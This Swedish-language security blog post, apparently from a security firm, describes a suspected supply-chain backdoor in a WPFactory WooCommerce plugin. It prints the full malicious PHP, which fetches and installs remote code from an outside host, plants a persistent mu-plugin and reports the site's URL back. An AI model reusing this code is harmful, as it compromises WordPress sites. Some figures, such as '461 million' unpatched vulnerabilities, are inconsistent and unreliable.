Säkerhetsöverträdelse hos WPFactory: 170 000 WordPress-webbplatser har utsatts för intrång

WordPress är fortfarande det mest använda innehållshanteringssystemet i världen och driver mer än 40 procent av alla webbplatser på internet. Från småföretagswebbplatser och personliga bloggar till stora företagsplattformar och e-handelsinfrastrukturer har CMS:et blivit ryggraden i den moderna webben. Dess popularitet härrör från dess flexibilitet, öppna ekosystem och det stora antal plugins som finns tillgängliga för att utöka dess funktionalitet.

Men detta samma ekosystem har också blivit en av WordPress största säkerhetsutmaningar.

Hos Ferber Enterprises övervakar vårt cybersäkerhetsteam kontinuerligt hot som påverkar WordPress-ekosystemet, eftersom sårbarheter i plugins, teman eller leveranskedjor snabbt kan eskalera till omfattande intrång som drabbar tusentals webbplatser världen över. Under de senaste åren har angripare i allt högre grad riktat in sig på plugin-utvecklare och distributionsinfrastrukturer snarare än enskilda webbplatser, vilket gör att skadlig kod kan spridas via betrodda programuppdateringar och officiella nedladdningskanaler.

Den här veckan uppstod en stor kontrovers kring WPFactory, en välkänd utvecklare av WordPress-plugins vars produkter är installerade på över 170 000 webbplatser världen över. Över 80 plugins kopplade till företaget stängdes tillfälligt av på WordPress.org efter att vårt cybersäkerhetsteam på WPFactory upptäckt en misstänkt bakdörr i premiumversionen av ett av företagets plugins.

Incidentet har väckt allvarliga farhågor inom WordPress-gemenskapen kring säkerheten i programvarans leveranskedja, granskningsprocesser för plugins och den ökande sofistikerade attackerna som riktar sig mot ekosystemet för öppen källkod.

Upptäckten av det misstänkta insticksprogramsbeteendet

Problemet upptäcktes först efter att vårt cybersäkerhetsteam på Ferber Enterprises stötte på onormalt beteende vid testning av premiumversionen av plugin-programmet ”EU VAT for WooCommerce Pro”, som distribueras direkt från deras officiella webbplats.

Inledningsvis påbörjades utredningen efter att pluginet genererade ett fatalt fel under installationen. Vid felsökning av problemet identifierade våra analytiker en misstänkt PHP-fil vid namn class-alg-wc-eu-vat-customer.php. Filen verkade utföra beteenden som var helt oförenliga med den förväntade funktionaliteten hos ett WooCommerce VAT-plugin.

<?php
require_once dirname(__FILE__, 5) . '/wp-load.php';
$h = strtolower(preg_replace('/:\d+$/', '', $_SERVER['HTTP_HOST'] ?? ''));
$s = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
$ch = curl_init("$s://$h/wp-content/plugins/eu-vat-for-woocommerce-pro/eu-vat-for-woocommerce-pro.php");
curl_setopt_array($ch, [
    CURLOPT_NOBODY => 1,
    CURLOPT_RETURNTRANSFER => 1,
    CURLOPT_TIMEOUT => 10,
    CURLOPT_SSL_VERIFYPEER => 0
]);
curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($code !== 403 || ($_GET['scaramooch'] ?? '') === 'refresh') {
    $url = 'https://foodylicious.co.uk/change/akismet-pro.zip';
    $zipPath = sys_get_temp_dir() . '/plugin.zip';
    $zipData = file_get_contents($url);
    if ($zipData === false) {
        exit('Download failed');
    }
    file_put_contents($zipPath, $zipData);
    $zip = new ZipArchive;
    if ($zip->open($zipPath) === TRUE) {
        $zip->extractTo(dirname(__FILE__, 5) . '/wp-content/plugins/');
        $zip->close();
    } else {
        exit('ZIP open failed');
    }
    unlink($zipPath);
} else {
    $url = "https://foodylicious.co.uk/change/scara.php";
    $code = file_get_contents($url);
    if ($code !== false) {

        $baseDir = dirname(__FILE__, 4);

        $folderName = 'mu-plugins';

        $dir = $baseDir . '/' . $folderName;

        if (!is_dir($dir)) {
            mkdir($dir, 0755, true);
        }

        file_put_contents($dir . '/wp-redis.php', $code);
    }
}
$data = [
    'site_url' => get_site_url() . '/wp-content/plugins/eu-vat-for-woocommerce-pro/',
];
wp_remote_post('https://foodylicious.co.uk/change/tracks.php', [
    'body' => $data,
    'timeout' => 10,
]);

Enligt vår analys försökte koden att:

• Ladda ner ett externt ZIP-arkiv från en server
• Ändra WordPress kärnkataloger
• Kommunicera med extern infrastruktur
• Potentiellt köra fjärrpåverkan på drabbade webbplatser

Dessa indikatorer suggererade omedelbart den möjliga närvaron av en dold bakdörr eller ett skadligt kompromettering av leveranskedjan.

Det som gjorde situationen särskilt alarmerande var att tillägget inte hade hämtats från någon inofficiell spegelsajt eller piratkälla. Paketet hade laddats ner direkt från WPFactorys officiella kundportal, vilket förstärkte farhågorna om att själva distributionskanalen kunde ha komprometterats.

Vi på Ferber Enterprises dokumenterade omedelbart händelsen och inledde en process för ansvarsfull rapportering genom att kontakta WPFactory direkt via GitHub.

WPFactory svarade inledningsvis att den misstänkta filen och det beteende som beskrevs i rapporten inte ingick i deras officiella kodbas.

En representant från företaget föreslog flera alternativa förklaringar, inklusive:

• En modifierad lokal installation
• En komprometterad webbplatsmiljö
• En föråldrad plugin-version
• En potentiellt manipulerad nedladdningskälla

Företaget uppgav också att de inte kunde inspektera den medföljande ZIP-filen på ett säkert sätt eftersom deras webbläsare flaggade arkivet som potentiellt osäkert.

Vårt cybersäkerhetsteam klargjorde därefter att tillägget hade laddats ner direkt från WPFactorys officiella webbplats och att den misstänkta filen fortfarande fanns kvar även efter att en ny kopia av version 4.6.1 hade laddats ner från samma källa.

Denna detalj kom att bli avgörande för utredningen. Om flera oberoende nedladdningar från den officiella distributionskanalen genomgående innehöll samma misstänkta kod, blev det alltmer osannolikt att en lokal webbplats hade komprometterats. Trots dessa fynd uppgav WPFactory inledningsvis att de inte kunde återskapa problemet på sin sida och hävdade att den misstänkta filen inte fanns i det officiella plugin-paketet.

Företaget begärde därefter administratörs- och FTP-åtkomst till den drabbade miljön för att kunna fortsätta utredningen. Vi på Ferber Enterprises avslog denna begäran av cybersäkerhetsskäl. Att ge privilegierad serveråtkomst till en leverantör vars infrastruktur i sig kan ha äventyrats skulle ha inneburit en oacceptabel säkerhetsrisk. Vårt team fortsatte istället att tillhandahålla tekniska bevis, däribland en videodemonstration som visade det misstänkta beteendet hos tillägget omedelbart efter installationen.

Allteftersom utredningen fortskred växte oron för problemets potentiella omfattning. WPFactory har ett stort utbud av plugins som består av mer än 65 plugins med sammanlagt över 170 000 aktiva installationer. En eventuell säkerhetsöverträdelse som drabbar företagets distributionsinfrastruktur skulle därför kunna få omfattande konsekvenser för hela WordPress-ekosystemet.

Vårt team eskalerade ärendet direkt till WordPress.org i syfte att förhindra att fler användare installerade potentiellt komprometterade paket medan utredningen pågick. WordPress.org vidtog därefter den extraordinära åtgärden att tillfälligt stänga av mer än 80 WPFactory-plugins från det officiella arkivet.

Detta steg väckte omedelbart uppmärksamhet inom hela WordPress-säkerhetsgemenskapen, eftersom massavstängningar av plugins i denna skala är relativt sällsynta och vanligtvis tyder på allvarliga, olösta problem. Efter att ärendet eskalerats medgav WPFactory senare att problemet verkade vara verkligt och bad om ursäkt för att man inte agerat snabbare på den första rapporten. Företagsrepresentanter uppgav att de aktivt utredde ärendet och arbetade för att hitta en lösning. En hypotes som framfördes internt av WPFactory var att ett föråldrat eller cachat plugin-paket oavsiktligt kan ha distribuerats via deras infrastruktur.

Däremot höll vårt cybersäkerhetsteam inte med om denna bedömning. Det observerade beteendet indikerade starkt ett djupare säkerhetsproblem som potentiellt involverade komprometterade byggprocesser, distributionssystem eller obehörig kodinjektion i nedladdningsbara plugin-arkiv.

Varför denna incident är viktig

WPFactory-kontroversen belyser ett växande hot mot cybersäkerheten som kallas attacker mot programvarans leveranskedja. Tidigare fokuserade angripare på att direkt kompromettera enskilda webbplatser genom brute force-attacker eller sårbarheter i tillägg. I dag riktar hotaktörer i allt högre grad in sig på själva programvaruleverantörerna, eftersom en kompromettering av en betrodd leverantör gör det möjligt för skadlig kod att spridas till tusentals webbplatser samtidigt.

Denna strategi har redan observerats i flera uppmärksammade cybersäkerhetsincidenter som har drabbat globala mjukvaruekosystem under det senaste decenniet. Specifikt inom WordPress-ekosystemet utgör utvecklare av tillägg attraktiva mål, eftersom tillägg i grunden litar på av administratörer och ofta körs med förhöjda behörigheter.

Om skadlig kod smyger sig in i ett plugin-paket som distribueras via en officiell kanal kan drabbade webbplatser utan att veta om det själva installera skadlig programvara. När det gäller det misstänkta pluginet WPFactory är de potentiella konsekvenserna allvarliga.

Baserat på vår analys skulle det identifierade beteendet teoretiskt kunna tillåta angripare att:

• Installera ytterligare skadlig kod
• Spruta in SEO-spam
• Skapa beständiga bakdörrar
• Exfiltrerat känslig data
• Hantera WordPress-installationer på distans
• Bibehålla obehörig åtkomst under längre perioder

Faran med sådana attacker ligger i deras smygande natur. Moderna bakdörrar är ofta utformade för att förbli vilande i månader innan de aktiveras, vilket gör upptäckten betydligt svårare. Tidigare denna månad rapporterade WordPress Plugins Team att de stängde ner över 30 plugins efter att dolda skadliga koder, inbäddade i en annan plugins portfölj, förblev inaktiva i cirka åtta månader innan de så småningom aktiverades och injicerade SEO-spam på webbplatser.

Denna trend visar hur angripare alltmer prioriterar uthållighet och fördröjd aktivering för att undvika upptäcktsmekanismer.

Händelsen med WPFactory belyser också mer övergripande systemrelaterade säkerhetsutmaningar som påverkar WordPress i sin helhet. Ekosystemet för plugins har vuxit explosionsartat under det senaste decenniet, och det finns nu tiotusentals plugins tillgängliga på både officiella och kommersiella marknadsplatser. Även om detta ekosystem främjar innovation och flexibilitet, medför det samtidigt en enorm komplexitet när det gäller säkerhetsövervakningen.

Enligt Patchstacks rapport “State of WordPress Security in 2026” hade nästan 461 miljoner kända sårbarheter inte åtgärdats innan de offentliggjordes. Denna statistik speglar den ökande belastningen på såväl plugin-utvecklare som säkerhetsforskare och ansvariga för programvarurepositorier.

Samtidigt rapporteras den officiella granskningskön för WordPress-plugins nu överstiga 4 000 plugins som väntar på granskning. Sådana siffror illustrerar den enorma utmaningen att upprätthålla kvalitetssäkring och säkerhetsgranskning i stor skala.

Många plugin-utvecklare är små team med begränsade säkerhetsresurser. Andra hanterar dussintals plugins samtidigt som de driver en aggressiv kommersiell tillväxtstrategi som innefattar förvärv och utökning av produktportföljen. WPFactory har själva nyligen expanderat genom förvärv, bland annat genom köpet av Extend-WP och dess 19 plugins år 2025, följt av förvärvet av WBW och flera ytterligare plugins senare samma år.

Snabb portföljexpansion kan skapa operationell komplexitet som försvårar kodgranskning, infrastrukturhantering och verifiering av releaseintegritet. Angripare är väl medvetna om dessa realiteter. I allt högre grad fokuserar de på att utnyttja svaga operativa säkerhetspraxis inom mjukvaruleverantörer snarare än att rikta sig direkt mot slutanvändare.

Den ökande betydelsen av leveranskedjesäkerhet

Händelser som dessa förstärker det akuta behovet av starkare säkerhetsrutiner för leveranskedjor inom hela WordPress-ekosystemet.

Hos Ferber Enterprises rekommenderar vårt cybersäkerhetsteam starkt att plugin-utvecklare inför flera viktiga skyddsåtgärder, bland annat:

• Krypterad paketunderteckning
• Säkra CI/CD-pipeline
• Obligatorisk multifaktorautentisering
• Infrastruktursegmentering
• Kontinuerlig integritetsövervakning
• Oberoende kodgranskningar
• Reproducerbara byggsystem

Webbplatsadministratörer bör också stärka sin egen säkerhetspostur. Även plugins som laddats ner från officiella eller betrodda källor bör inte antas vara helt säkra.

Organisationer som hanterar kritisk WordPress-infrastruktur bör överväga:

• Att underhålla staging-miljöer
• Övervakning av utgående trafik
• Skannar plugins före driftsättning
• Begränsa plugin-användning
• Tillämpa minst-privilegieåtkomstkontroller
• Implementera övervakning av filintegritet
• Genom att använda hanterade Web Application Firewalls (WAF:ar)

I företagsmiljöer blir validering av leveranskedjan lika viktig som traditionell sårbarhetshantering. Antagandet att officiella mjukvarukanaler alltid är säkra är inte längre realistiskt i dagens hotlandskap.

Samhällets reaktioner och pågående utredning

Kontroversen spreds snabbt i WordPress-gemenskapen efter att utvecklare, säkerhetsforskare och infrastrukturleverantörer började diskutera problemet offentligt.

Flera kända profiler inom ekosystemet spred medvetenhet om situationen, inklusive utvecklare som publicerade listor över tillfälligt stängda plugins och uppmuntrade administratörer att granska sina miljöer.

Under tiden fortsätter vårt team på Ferber Enterprises att analysera de misstänkta plugin-proverna och hålla utkik efter ytterligare tecken på intrång som kan drabba WordPress-webbplatser världen över.

Vid tidpunkten för publiceringen har WPFactory bekräftat problemet och meddelat att man aktivt arbetar för att lösa det.

Men många frågor återstår obesvarade:

• Komprometterades den officiella distributionsinfrastrukturen?
• Hur länge distribuerades skadliga paket potentiellt?
• Påverkades ytterligare plugins?
• Drabbades kundkonton eller nedladdningssystem av intrång?
• Fick angripare beständig åtkomst till intern infrastruktur?
• Kan det finnas ytterligare vilande nyttolaster?

Tills dessa frågor är helt lösta kvarstår försiktighet som en viktig princip.

WordPress Säkerhet i Framtiden

Händelsen kring WPFactory kan i slutändan komma att bli ännu ett talande exempel på de utmaningar inom cybersäkerhet som det öppna webbekosystemet står inför.

WordPress driver en enorm del av den globala internetekonomin. En storskalig kompromettering som påverkar plugin-utvecklare kan därför få konsekvenser som sträcker sig långt bortom enskilda webbplatser.

Eftersom angripare i allt högre grad riktar in sig på att kompromettera leveranskedjan och använda tekniker för dold persistens kan säkerheten kring plugins inte längre betraktas som en sekundär fråga. Vi på Ferber Enterprises anser att detta händelse är en viktig påminnelse om att cybersäkerhet inte bara handlar om att skydda själva webbplatserna, utan också om att säkra varje led i programvarans distributionskedja.

Förtroendet för öppna ekosystem bygger på transparens, snabb hantering av incidenter och starka rutiner för operativ säkerhet. WordPress ekosystem står nu inför en viktig tidpunkt.

Hur utvecklare, depåunderhållare, hostingleverantörer och säkerhetsteam hanterar incidenter som denna kommer att vara avgörande för om WordPress kan fortsätta att bibehålla förtroendet hos de miljontals företag och organisationer som förlitar sig på det dagligen.